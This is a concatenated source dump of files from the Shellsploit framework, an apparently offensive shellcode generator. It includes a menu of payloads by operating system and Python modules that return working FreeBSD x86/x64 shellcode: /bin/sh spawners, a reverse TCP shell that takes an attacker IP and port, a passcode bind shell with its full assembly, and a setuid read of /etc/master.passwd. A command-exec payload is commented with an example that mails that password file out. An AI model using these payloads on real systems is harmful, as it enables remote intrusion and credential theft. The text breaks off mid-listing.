https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from random import randint 9 | from sys import platform 10 | 11 | if 'linux' not in platform and 'darwin' not in platform: 12 | from colorama import init 13 | init(autoreset=True) 14 | 15 | #http://asciiset.com/figletserver.html 16 | def banner( num1,num2,num3,num4): 17 | logo =[""" 18 | ____ ___ ___ ___ ___ 19 | 6MMMMb\ `MM `MM `MM `MM 68b 20 | 6M' ` MM MM MM MM Y89 / 21 | MM MM __ ____ MM MM ____ __ ____ MM _____ ___ /M 22 | YM. MM 6MMb 6MMMMb MM MM 6MMMMb\ `M6MMMMb MM 6MMMMMb `MM /MMMMM 23 | YMMMMb MMM9 `Mb 6M' `Mb MM MM MM' ` MM' `Mb MM 6M' `Mb MM MM 24 | `Mb MM' MM MM MM MM MM YM. MM MM MM MM MM MM MM 25 | MM MM MM MMMMMMMM MM MM YMMMMb MM MM MM MM MM MM MM 26 | MM MM MM MM MM MM `Mb MM MM MM MM MM MM MM 27 | L ,M9 MM MM YM d9 MM MM L ,MM MM. ,M9 MM YM. ,M9 MM YM. , 28 | MYMMMM9 _MM_ _MM_ YMMMM9 _MM__MM_MYMMMM9 MMYMMM9 _MM_ YMMMMM9 _MM_ YMMM9 29 | MM 30 | MM 31 | _MM_ 32 | """, 33 | 34 | """ 35 | .d8888. db db d88888b db db .d8888. d8888b. db .d88b. d888888b d888888b 36 | 88' YP 88 88 88' 88 88 88' YP 88 `8D 88 .8P Y8. `88' `~~88~~' 37 | `8bo. 88ooo88 88ooooo 88 88 `8bo. 88oodD' 88 88 88 88 88 38 | `Y8b. 88~~~88 88~~~~~ 88 88 `Y8b. 88~~~ 88 88 88 88 88 39 | db 8D 88 88 88. 88booo. 88booo. db 8D 88 88booo. `8b d8' .88. 88 40 | `8888Y' YP YP Y88888P Y88888P Y88888P `8888Y' 88 Y88888P `Y88P' Y888888P YP 41 | 42 | """, 43 | """ 44 | _______ __ __ __ __ __ __ 45 | | __|| |--..-----.| || |.-----..-----.| |.-----.|__|| |_ 46 | |__ || || -__|| || ||__ --|| _ || || _ || || _| 47 | |_______||__|__||_____||__||__||_____|| __||__||_____||__||____| 48 | |__| 49 | 50 | """, 51 | """ 52 | .d8888b. 888 888 888 888 d8b 888 53 | d88P Y88b 888 888 888 888 Y8P 888 54 | Y88b. 888 888 888 888 888 55 | "Y888b. 88888b. .d88b. 888 888 .d8888b 88888b. 888 .d88b. 888 888888 56 | "Y88b. 888 "88b d8P Y8b 888 888 88K 888 "88b 888 d88""88b 888 888 57 | "888 888 888 88888888 888 888 "Y8888b. 888 888 888 888 888 888 888 58 | Y88b d88P 888 888 Y8b. 888 888 X88 888 d88P 888 Y88..88P 888 Y88b. 59 | "Y8888P" 888 888 "Y8888 888 888 88888P' 88888P" 888 "Y88P" 888 "Y888 60 | 888 61 | 888 62 | 888 63 | """, 64 | """ 65 | _______ __ __ __ __ __ __ 66 | | _ | | |--. .-----. | | | | .-----. .-----. | | .-----. |__| | |_ 67 | | 1___| | | | -__| | | | | |__ --| | _ | | | | _ | | | | _| 68 | |____ | |__|__| |_____| |__| |__| |_____| | __| |__| |_____| |__| |____| 69 | |: 1 | |__| 70 | |::.. . | 71 | `-------' 72 | """, 73 | """ 74 | _______ _ _ _______ _______ _____ _____ _____ _______ 75 | |______ |_____| |______ | | |______ |_____] | | | | | 76 | ______| | | |______ |_____ |_____ ______| | |_____ |_____| __|__ | 77 | 78 | """, 79 | 80 | ] 81 | 82 | #num1 Shellcode amount 83 | #num2 Os type amount 84 | #num3 Encoder amount 85 | #num4 injector amount 86 | 87 | 88 | dlogo = """ 89 | \033[32m=[ Shellsploit v1 - \033[1;31m BETA \033[0m\033[32m] 90 | \033[32m+ -- --=[ %s shellcode - \033[1;31m%s Different OS \033[0m\033[32m] 91 | \033[32m+ -- --=[ %s encoders - \033[1;31m (Shellcodes/executable files) \033[0m\033[32m] 92 | \033[32m+ -- --=[ %s injector - \033[1;31m (PE,ELF,DLL,RAR,DEB etc...) \033[0m\033[32m] 93 | \033[32m+ -- --=[ %s backdoors - \033[1;31m (ReverseShell) \033[0m\033[32m] 94 | \033[32m+ -- --=[ Open Source : \033[1;31mhttps://github.com/b3mb4m/Shellsploit \033[0m\033[32m] 95 | """ % (num1,num2,num3,num4, "9") 96 | #Will be add a function(counterloop) for backdoors .. 97 | 98 | return '\033[1;31m'+logo[randint(0, len(logo)-1)]+'\033[0m'+dlogo 99 | 100 | 101 | 102 | 103 | -------------------------------------------------------------------------------- /shell/core/shellcodeformat.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | 9 | from re import findall 10 | 11 | def prettyout( shellcode): 12 | data = shellcode.replace("\\x", "") 13 | db = [] 14 | print ("\n") 15 | for x in [data[x:x+40] for x in range(0, len(data), 40)]: 16 | db = findall("..?", x) 17 | if data.endswith( x): 18 | print ('\t"\\x'+"\\x".join(db)+'"') 19 | else: 20 | print ('\t"\\x'+"\\x".join(db)+'"'+' +') 21 | print ("\n") 22 | 23 | -------------------------------------------------------------------------------- /shell/core/shellcodes.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from .color import * 9 | 10 | def shellcodelist( getlist=False): 11 | if getlist == False: 12 | print (bcolors.GREEN+""" 13 | 14 | Linux x86 15 | =========== 16 | 17 | linux86/exec 18 | linux86/binsh_spawn 19 | linux86/read 20 | linux86/chmod 21 | linux86/tcp_bind 22 | linux86/reverse_tcp 23 | 24 | 25 | Linux x64 26 | =========== 27 | 28 | linux64/binsh_spawn 29 | linux64/read 30 | linux64/tcp_bind 31 | linux64/reverse_tcp 32 | 33 | 34 | Linux x86/x64 [Works on both] 35 | =========== 36 | 37 | linux/binsh_spawn 38 | linux/read 39 | linux/tcp_bind 40 | linux/reverse_tcp 41 | 42 | 43 | Linux ARM 44 | =========== 45 | 46 | linux_arm/exec 47 | linux_arm/binsh_spawn 48 | linux_arm/chmod 49 | linux_arm/reverse_tcp 50 | 51 | 52 | Linux MIPS 53 | =========== 54 | 55 | linux_mips/binsh_spawn 56 | linux_mips/chmod 57 | linux_mips/tcp_bind 58 | 59 | 60 | 61 | Solaris x86 62 | =========== 63 | 64 | solarisx86/binsh_spawn 65 | solarisx86/read 66 | solarisx86/reverse_tcp 67 | solarisx86/tcp_bind 68 | 69 | Windows 70 | =========== 71 | 72 | windows/exec 73 | windows/messagebox 74 | windows/download&execute 75 | windows/reverse_tcp 76 | windows/tcp_bind 77 | 78 | 79 | 80 | OSX x86 81 | =========== 82 | 83 | osx86/tcp_bind 84 | osx86/binsh_spawn 85 | osx86/reverse_tcp 86 | 87 | 88 | OSX x64 89 | =========== 90 | 91 | osx64/binsh_spawn 92 | osx64/reverse_tcp 93 | osx64/tcp_bind 94 | 95 | 96 | FreeBSD x86 97 | ============ 98 | 99 | FreeBSDx86/binsh_spawn 100 | FreeBSDx86/read 101 | FreeBSDx86/tcp_bind 102 | FreeBSDx86/reverse_tcp 103 | FreeBSDx86/reverse_tcp2 (through /bin/sh) 104 | FreeBSDx86/exec 105 | 106 | 107 | FreeBSD x64 108 | ============ 109 | 110 | FreeBSDx64/exec 111 | FreeBSDx64/binsh_spawn 112 | FreeBSDx64/tcp_bind 113 | FreeBSDx64/reverse_tcp 114 | """ + bcolors.ENDC) 115 | 116 | else: 117 | return [ 118 | "linux86/exec", 119 | "linux86/binsh_spawn", 120 | "linux86/read", 121 | "linux86/chmod", 122 | "linux86/tcp_bind", 123 | "linux86/reverse_tcp", 124 | 125 | "linux64/binsh_spawn", 126 | "linux64/read", 127 | "linux64/tcp_bind", 128 | "linux64/reverse_tcp", 129 | 130 | 131 | "linux/binsh_spawn", 132 | "linux/read", 133 | "linux/tcp_bind", 134 | "linux/reverse_tcp", 135 | 136 | 137 | "linux_arm/exec", 138 | "linux_arm/binsh_spawn", 139 | "linux_arm/chmod", 140 | "linux_arm/reverse_tcp", 141 | 142 | 143 | "linux_mips/binsh_spawn", 144 | "linux_mips/chmod", 145 | "linux_mips/tcp_bind", 146 | 147 | 148 | "solarisx86/binsh_spawn", 149 | "solarisx86/read", 150 | "solarisx86/reverse_tcp", 151 | "solarisx86/tcp_bind", 152 | 153 | 154 | "windows/exec", 155 | "windows/messagebox", 156 | "windows/download&execute", 157 | "windows/reverse_tcp", 158 | "windows/tcp_bind", 159 | 160 | 161 | "osx86/tcp_bind", 162 | "osx86/binsh_spawn", 163 | "osx86/reverse_tcp", 164 | 165 | 166 | "osx64/binsh_spawn", 167 | "osx64/reverse_tcp", 168 | "osx64/tcp_bind", 169 | 170 | 171 | "FreeBSDx86/binsh_spawn", 172 | "FreeBSDx86/read", 173 | "FreeBSDx86/tcp_bind", 174 | "FreeBSDx86/reverse_tcp", 175 | "FreeBSDx86/reverse_tcp2", 176 | "FreeBSDx86/exec", 177 | 178 | 179 | 180 | "FreeBSDx64/exec", 181 | "FreeBSDx64/binsh_spawn", 182 | "FreeBSDx64/tcp_bind", 183 | "FreeBSDx64/reverse_tcp", 184 | ] -------------------------------------------------------------------------------- /shell/core/whatisthis.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | #Author : B3mB4m 3 | #Concat : b3mb4m@protonmail.com 4 | #Project : https://github.com/b3mb4m/Shellsploit 5 | #LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | 9 | #https://en.wikipedia.org/wiki/Shellcode 10 | from .color import * 11 | 12 | 13 | def whatisthis( choice): 14 | if choice == "Local": 15 | message = """ 16 | Local shellcode is used by an attacker who has limited access to a machine but can exploit a vulnerability, 17 | for example a buffer overflow, in a higher-privileged process on that machine. If successfully executed, 18 | the shellcode will provide the attacker access to the machine with the same higher privileges as the targeted process. 19 | """ 20 | 21 | elif choice == "Remote": 22 | message = """ 23 | Remote shellcode is used when an attacker wants to target a vulnerable process running on another machine on a local network or intranet. 24 | If successfully executed, the shellcode can provide the attacker access to the target machine across the network. 25 | """ 26 | 27 | elif choice == "Download and execute": 28 | message = """ 29 | Download and execute is a type of remote shellcode that downloads and executes some form of malware on the target system. 30 | This type of shellcode does not spawn a shell, but rather instructs the machine to download a certain executable file off the network, 31 | save it to disk and execute it. 32 | """ 33 | 34 | elif choice == "Egg-hunt": 35 | message = """ 36 | This is another form of staged shellcode, which is used if an attacker can inject a larger shellcode into the process 37 | but cannot determine where in the process it will end up. Small egg-hunt shellcode is injected into the process at a predictable 38 | location and executed. This code then searches the process's address space for the larger shellcode (the egg) and executes it. 39 | """ 40 | 41 | print (bcolors.RED + bcolors.BOLD + message + bcolors.ENDC) -------------------------------------------------------------------------------- /shell/database/FreeBSDx64/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/FreeBSDx64/__init__.py -------------------------------------------------------------------------------- /shell/database/FreeBSDx64/bin_sh.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/13279/ 2 | #* Authors: 3 | #* Maycon M. Vitali ( 0ut0fBound ) 4 | #* Milw0rm .: http://www.milw0rm.com/author/869 5 | #* Page ....: http://maycon.hacknroll.com 6 | #* Email ...: maycon@hacknroll.com 7 | #* 8 | #* Anderson Eduardo ( c0d3_z3r0 ) 9 | #* Milw0rm .: http://www.milw0rm.com/author/1570 10 | #* Page ....: http://anderson.hacknroll.com 11 | #* Email ...: anderson@hacknroll.com 12 | # 13 | #amd64# gcc hacknroll.c -o hacknroll 14 | #amd64# ./hacknroll 15 | # exit 16 | #amd64# 17 | 18 | """ 19 | "\x48\x31\xc0" // xor %rax,%rax 20 | "\x99" // cltd 21 | "\xb0\x3b" // mov $0x3b,%al 22 | "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622fff,%rdi 23 | "\x48\xc1\xef\x08" // shr $0x8,%rdi 24 | "\x57" // push %rdi 25 | "\x48\x89\xe7" // mov %rsp,%rdi 26 | "\x57" // push %rdi 27 | "\x52" // push %rdx 28 | "\x48\x89\xe6" // mov %rsp,%rsi 29 | "\x0f\x05"; // syscall 30 | """ 31 | 32 | 33 | 34 | 35 | def bin_sh(): 36 | shellcode = r"\x48\x31\xc0\x99\xb0\x3b" 37 | shellcode += r"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" 38 | shellcode += r"\x48\xc1\xef\x08\x57\x48\x89\xe7\x57\x52" 39 | shellcode += r"\x48\x89\xe6\x0f\x05" 40 | return shellcode 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /shell/database/FreeBSDx64/execc.py: -------------------------------------------------------------------------------- 1 | def execc( command): 2 | shellcode = r"\x48\x31\xd2\xe8\x06\x00\x00\x00\x68\x65\x6c" 3 | shellcode += r"\x6c\x6f\x00\x5f\x52\x57\x48\x89\xe6\x48\x31\xc0\x48\x83\xc8\x3b\x0f\x05" 4 | return shellcode 5 | 6 | 7 | #Shellcode disassembly with 32bit so must be edit little bit.Instructions are wrong. 8 | """ 9 | 00000000 48 dec eax 10 | 00000001 31D2 xor edx,edx 11 | 00000003 E806000000 call dword 0xe 12 | 00000008 68656C6C6F push dword 0x6f6c6c65 13 | 0000000D 005F52 add [edi+0x52],bl 14 | 00000010 57 push edi 15 | 00000011 48 dec eax 16 | 00000012 89E6 mov esi,esp 17 | 00000014 48 dec eax 18 | 00000015 31C0 xor eax,eax 19 | 00000017 48 dec eax 20 | 00000018 83C83B or eax,byte +0x3b 21 | 0000001B 0F05 syscall 22 | """ -------------------------------------------------------------------------------- /shell/database/FreeBSDx64/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | def reverse_tcp( IP, PORT): 2 | shellcode = r"\x31\xc0\x83\xc0\x61\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2" 3 | shellcode += r"\x0f\x05\x49\x89\xc4\x48\x89\xc7\x31\xc0\x83\xc0\x62\x48" 4 | shellcode += r"\x31\xf6\x56\x48\xbe\x00\x02" 5 | shellcode += PORT 6 | shellcode += IP 7 | shellcode += r"\x56" 8 | shellcode += r"\x48\x89\xe6\x6a\x10\x5a\x0f\x05\x4c\x89\xe7\x31\xc0\x83" 9 | shellcode += r"\xc0\x5a\x48\x31\xf6\x0f\x05\x31\xc0\x83\xc0\x5a\x48\xff" 10 | shellcode += r"\xc6\x0f\x05\x48\x31\xc0\x31\xc0\x83\xc0\x3b\xe8\x08\x00" 11 | shellcode += r"\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24" 12 | shellcode += r"\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05" 13 | return shellcode -------------------------------------------------------------------------------- /shell/database/FreeBSDx64/tcp_bind.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-865.php 2 | 3 | """ 4 | /* 5 | * Gitsnik, @dracyrys 6 | * FreeBSD x86_64 bind_tcp with passcode, 127 bytes 7 | * Passcode: R2CBw0cr 8 | */ 9 | """ 10 | 11 | def tcp_bind( PORT,PASSWORD): 12 | shellcode = r"\x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x99" 13 | shellcode += r"\x0f\x05\x48\x97\xba\xff\x02" 14 | shellcode += PORT 15 | shellcode += r"\x80\xf2\xff\x52\x48\x89\xe6\x99\x04\x66\x80" 16 | shellcode += r"\xc2\x10\x0f\x05\x04\x6a\x0f\x05\x04\x1e" 17 | shellcode += r"\x48\x31\xf6\x99\x0f\x05\x48\x97\x6a\x03" 18 | shellcode += r"\x58\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10" 19 | shellcode += r"\x0f\x05\x48\xb8" 20 | #R2CBw0crw 21 | #"\x52\x32\x43\x42\x77\x30\x63\x72" 22 | shellcode += PASSWORD 23 | shellcode += r"\x57\x48\x8d\x3e\x48\xaf\x74\x08" 24 | shellcode += r"\x48\x31\xc0\x48\xff\xc0\x0f\x05\x5f\x48" 25 | shellcode += r"\x89\xd0\x48\x89\xfe\x48\xff\xce\xb0\x5a" 26 | shellcode += r"\x0f\x05\x75\xf7\x99\x04\x3b\x48\xbb\x2f" 27 | shellcode += r"\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53\x54" 28 | shellcode += r"\x5f\x52\x57\x54\x5e\x0f\x05" 29 | return shellcode 30 | 31 | """ 32 | Assembly Intel Source: 33 | 34 | global _start 35 | 36 | ; 37 | ; Bindshell in 64 bit shellcode (written 38 | ; and tested on a FreeBSD 9.1 AMD64 OS) 39 | ; 40 | ; Author: Gitsnik 41 | ; Twitter: @dracyrys 42 | ; Passcode: R2CBw0cr 43 | ; 127 bytes 44 | ; 45 | 46 | section .text 47 | 48 | _start: 49 | ; 50 | ; int socket( 2, 1, 0 ) 51 | ; 52 | ; socket will return a socket into rax 53 | ; 54 | ; 12 bytes 55 | ; 56 | push byte 0x61 57 | pop rax 58 | push byte 0x02 59 | pop rdi 60 | push byte 0x01 61 | pop rsi 62 | cdq ; rdx is null 63 | syscall ; socket( 2, 1, 0 ) 64 | 65 | ; 66 | ; Swap our socket from RAX into RDI which is where 67 | ; the next few functions want it anyway 68 | ; 69 | ; xchg is 1 byte shorter than mov 70 | ; 71 | ; 2 bytes 72 | xchg rdi, rax ; socket in rdi for bind() rax is now 2 73 | 74 | ; 75 | ; bind( sockfd, *addr, addrlen ) 76 | ; 77 | ; We need to set up our serv_addr (which we know is 0,port,2) 78 | ; So load it all into RAX and push that. Note that because we want 79 | ; 7 bytes but the register is 8, we pad 0xff onto the back and then 80 | ; xor it to null to line everything up. 81 | ; 82 | ; 20 bytes 83 | 84 | mov edx, 0xaaaa02ff 85 | xor dl, 0xff 86 | push rdx 87 | mov rsi, rsp ; rsi points to our sockaddr * 88 | 89 | cdq ; reset RDX 90 | add al, 0x66 ; bind() is 0x68 but rax is already 0x02 91 | add dl, 0x10 ; 16 (sizeof) 92 | syscall 93 | 94 | ; 95 | ; listen is 0x6a 96 | ; 97 | ; listen( sockfd, backlog ) 98 | ; 99 | ; bind() returns 0 on success, so add al, RDI already points at our 100 | ; sockfd, and we don't care what's in backlog but because it's a 101 | ; stack pointer from a few lines back the number is sufficiently high 102 | ; that it doesn't matter. 103 | ; 104 | ; 4 bytes 105 | 106 | add al, 0x6a 107 | syscall 108 | 109 | ; 110 | ; accept( sockfd, 0, 0 ) 111 | ; 112 | ; accept() will return a new sockfd for us. 113 | ; 114 | ; 8 bytes 115 | ; 116 | add al, 0x1e 117 | xor rsi, rsi 118 | cdq 119 | syscall 120 | 121 | ; 122 | ; read( socket, buffer, length ) 123 | ; 124 | ; Calls should read: 125 | ; rax: syscall number (0x03 on FreeBSD) 126 | ; rdi: client socket 127 | ; rsi: buffer address 128 | ; rdx: read size (0xf) 129 | ; 130 | ; We take the returned sockfd ( client ) from rax and load it into rdi 131 | ; as our second argument. We set RAX to be 0x03, as this is the syscall 132 | ; ID (reference: /usr/include/sys/syscall.h) 133 | ; 134 | ; Set rsi to be rsp-0xf to give us 0xf bytes of space for a buffer 135 | ; and set dl to be our length. RDX is still null because of the cdq we 136 | ; did earlier. 137 | ; 138 | ; When we are finished RAX will be the number of bytes read from the socket 139 | ; RDI will be our client socket 140 | ; RSI will contain the pointer to our string for passcode comparison 141 | ; RDX will be 0x000000000000000F 142 | ; 143 | ; 16 bytes 144 | 145 | xchg rdi, rax 146 | push byte 0x03 ; 0x03 is read() in FreeBSD 147 | pop rax 148 | push rdx ; Still null from cdq up top. 149 | lea rsi, [rsp-0x10] 150 | add dl, 0x10 151 | syscall 152 | 153 | ; 154 | ; rsi has our string, rdi client socket 155 | ; 156 | ; 18 bytes 157 | ; 158 | mov rax, 0x7263307742433252 ; Replace your 8 character passcode here. 159 | push rdi ; save the socket 160 | lea rdi, [rsi] 161 | scasq 162 | jz dup2setup 163 | 164 | ; 165 | ; Exit 166 | ; 167 | ; 8 bytes 168 | ; 169 | xor rax, rax 170 | inc rax 171 | syscall 172 | 173 | ; 174 | ; Setup for dup2 loop 175 | ; 176 | ; 7 bytes 177 | ; 178 | dup2setup: 179 | pop rdi 180 | mov rax, rdx ; RDX is dl, 0x10 but otherwise 0x00 181 | ; so we can do this and then just correct 182 | ; in the dup2 loop. 183 | mov rsi, rdi 184 | 185 | ; 186 | ; dup2 loop 187 | ; 188 | ; 9 bytes 189 | dup2: 190 | dec rsi 191 | mov al, 0x5a 192 | syscall 193 | jnz dup2 194 | 195 | ; 196 | ; Now for the big one. Let's set up our execve() 197 | ; 198 | ; At this point RAX is 0 so just null out rdx 199 | ; 200 | ; We need rdx to be null for the 3rd argument to execve() 201 | ; 202 | ; 23 bytes 203 | cdq 204 | 205 | add al, 0x3b ; execve() 206 | mov rbx, 0x68732f2f6e69622f ; hs//nib/ 207 | 208 | ; Argument one shell[0] = "/bin//sh" 209 | push rdx ; null 210 | push rbx ; hs//nib/ 211 | 212 | ; We need pointers for execve() 213 | push rsp ; *pointer to shell[0] 214 | pop rdi ; Argument 1 215 | 216 | ; Argument two shell (including address of each argument in array) 217 | push rdx ; null 218 | push rdi ; address of shell[0] 219 | 220 | ; We need pointers for execve() 221 | push rsp ; address of char * shell 222 | pop rsi ; Argument 2 223 | 224 | syscall 225 | 226 | 227 | """ -------------------------------------------------------------------------------- /shell/database/FreeBSDx86/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/FreeBSDx86/__init__.py -------------------------------------------------------------------------------- /shell/database/FreeBSDx86/bin_sh.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-170.php 2 | #by IZ 3 | 4 | def bin_sh(): 5 | shellcode = r"\x31\xc0\x50\x68\x2f\x2f\x73\x68" 6 | shellcode += r"\x68\x2f\x62\x69\x6e\x89\xe3" 7 | shellcode += r"\x50\x54\x53\x50\xb0\x3b\xcd\x80" 8 | return shellcode 9 | -------------------------------------------------------------------------------- /shell/database/FreeBSDx86/execc.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-91.php 2 | 3 | 4 | """ 5 | /* 6 | *BSD version 7 | FreeBSD, OpenBSD, NetBSD. 8 | 9 | s0t4ipv6@shellcode.com.ar 10 | 11 | 92 bytes. 12 | 13 | _execve(/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"); 14 | pueden reemplzar el comando por lo que se les ocurra. 15 | */ 16 | 17 | main() 18 | { 19 | int *ret; 20 | printf("Shellcode lenght=%d\n",sizeof(shellcode)); 21 | ret=(int*)&ret+2; 22 | (*ret)=(int)shellcode; 23 | } 24 | 25 | """ 26 | 27 | #Must be test .. 28 | 29 | def command( command): 30 | shellcode = r"\xeb\x25" #/* jmp <_shellcode+39> */ 31 | shellcode += r"\x59" #/* popl %ecx */ 32 | shellcode += r"\x31\xc0" #/* xorl %eax,%eax */ 33 | shellcode += r"\x50" #/* pushl %eax */ 34 | shellcode += r"\x68\x6e\x2f\x73\x68" #/* push $0x68732f6e */ 35 | shellcode += r"\x68\x2f\x2f\x62\x69" #/* push $0x69622f2f */ 36 | shellcode += r"\x89\xe3" #/* movl %esp,%ebx */ 37 | shellcode += r"\x50" #/* pushl %eax */ 38 | shellcode += r"\x66\x68\x2d\x63" #/* pushw $0x632d */ 39 | shellcode += r"\x89\xe7" #/* movl %esp,%edi */ 40 | shellcode += r"\x50" #/* pushl %eax */ 41 | shellcode += r"\x51" #/* pushl %ecx */ 42 | shellcode += r"\x57" #/* pushl %edi */ 43 | shellcode += r"\x53" #/* pushl %ebx */ 44 | shellcode += r"\x89\xe7" #/* movl %esp,%edi */ 45 | shellcode += r"\x50" #/* pushl %eax */ 46 | shellcode += r"\x57" #/* pushl %edi */ 47 | shellcode += r"\x53" #/* pushl %ebx */ 48 | shellcode += r"\x50" #/* pushl %eax */ 49 | shellcode += r"\xb0\x3b" #/* movb $0x0b,%al */ 50 | shellcode += r"\xcd\x80" #/* int $0x80 */ 51 | shellcode += r"\xe8\xd6\xff\xff\xff" #/* call <_shellcode+2> */ 52 | #"/bin/cat /etc/master.passwd|mail root@localhost"; 53 | # /bin/sh -c "/bin/sh" 54 | shellcode += command 55 | return shellcode 56 | 57 | -------------------------------------------------------------------------------- /shell/database/FreeBSDx86/read.py: -------------------------------------------------------------------------------- 1 | #sm4x 2008 2 | #FreeBSD 7.0-RELEASE 3 | 4 | """ 5 | global _start 6 | _start: 7 | 8 | xor eax, eax 9 | 10 | ; --- setuid(0) 11 | push eax 12 | push eax 13 | mov al, 0x17 14 | int 0x80 15 | 16 | ; --- setup /etc/master.passwd 17 | jmp short load_file 18 | ok: 19 | pop esi 20 | 21 | ; setup /bin/cat 22 | push eax 23 | push 0x7461632f 24 | push 0x6e69622f 25 | mov ebx, esp 26 | 27 | ; --- array setup 28 | push eax ; null 29 | push esi ; /etc/master.passwd 30 | push ebx ; /bin/cat 31 | mov edx, esp 32 | 33 | ; -- execve() 34 | push eax ; 0 35 | push edx ; array { "/bin/cat", "/etc/master.passwd", 0} 36 | push ebx ; /bin/cat 37 | mov al, 0x3b 38 | push eax 39 | int 0x80 40 | 41 | ; --- exit 42 | push eax 43 | push eax 44 | int 0x80 45 | 46 | load_file: 47 | call ok 48 | db '/etc/master.passwd' 49 | """ 50 | 51 | def read( targetfile): 52 | code = r"\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f" 53 | code += r"\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62" 54 | code += r"\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50" 55 | code += r"\x52\x53\xb0\x3b\x50\xcd\x80\x50\x50\xcd" 56 | code += r"\x80\xe8\xdc\xff\xff\xff" 57 | #"\x2f\x65\x74\x63\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61\x73\x73\x77\x64" 58 | code += targetfile 59 | return code 60 | 61 | 62 | """ 63 | int main(int argc, char **argv) { 64 | int (*func)(); 65 | printf("Bytes: %d\n", sizeof(code)); 66 | func = (int (*)()) code; 67 | (int)(*func)(); 68 | } 69 | 70 | """ -------------------------------------------------------------------------------- /shell/database/FreeBSDx86/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-167.php 2 | 3 | #; sm4x - 2008 4 | #; reverse connect dl(shellcode) and execute, exit 5 | #; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ;) 6 | #; - feed it with a $nc -vvl -p8000 25 | #include 26 | #include 27 | 28 | char shellcode [] = "\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2" 29 | "\x68\x7f\x00\x00\x01\x66\x68\x05\x39\x66\x68\x01\x02\x89" 30 | "\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" 31 | "\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" 32 | "\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" 33 | "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"; 34 | 35 | void change_shellcode(const char *ip, unsigned short port) 36 | { 37 | *((unsigned long*)(shellcode + 15)) = inet_addr(ip); 38 | *((unsigned short*)(shellcode + 21)) = htons(port); 39 | } 40 | void print_shellcode(void) 41 | { 42 | int i; 43 | for(i = 0; i < sizeof(shellcode) - 1; i++) 44 | { 45 | printf("\\x%.2x", (unsigned char)shellcode[i]); 46 | } 47 | printf("\n"); 48 | } 49 | int main(void) 50 | { 51 | const char ip[] = "127.0.0.1"; 52 | unsigned short port = 1337; 53 | 54 | change_shellcode(ip, port); 55 | print_shellcode(); 56 | 57 | return 0; 58 | } 59 | """ 60 | -------------------------------------------------------------------------------- /shell/database/FreeBSDx86/tcp_bind.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-748.php 2 | def tcp_bind( PORT): 3 | shellcode = r"\x31\xc9\xf7\xe1\x51\x40\x50\x40\x50\x50\xb0\x61\xcd\x80\x96\x52\x66\x68" 4 | shellcode += PORT 5 | shellcode += r"\x66\x68\x01\x02\x89\xe1\x6a\x10\x51\x56\x50\xb0\x68\xcd" 6 | shellcode += r"\x80\x31\xc0\xb0\x05\x50\x56\x50\xb0\x6a\xcd\x80\x31\xc0\x50\x50\x56" 7 | shellcode += r"\x50\xb0\x1e\xcd\x80\x97\x31\xc0\x50\xb0\x02\xcd\x80\x09\xc0\x74\xea" 8 | shellcode += r"\x31\xc9\x31\xc0\x51\x57\x50\xb0\x5a\xcd\x80\xfe\xc1\x80\xf9\x03\x75" 9 | shellcode += r"\xf0\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89" 10 | shellcode += r"\xe1\x52\x51\x53\xb0\x3b\x50\xcd\x80" 11 | return shellcode -------------------------------------------------------------------------------- /shell/database/Linux/__init__.py: -------------------------------------------------------------------------------- 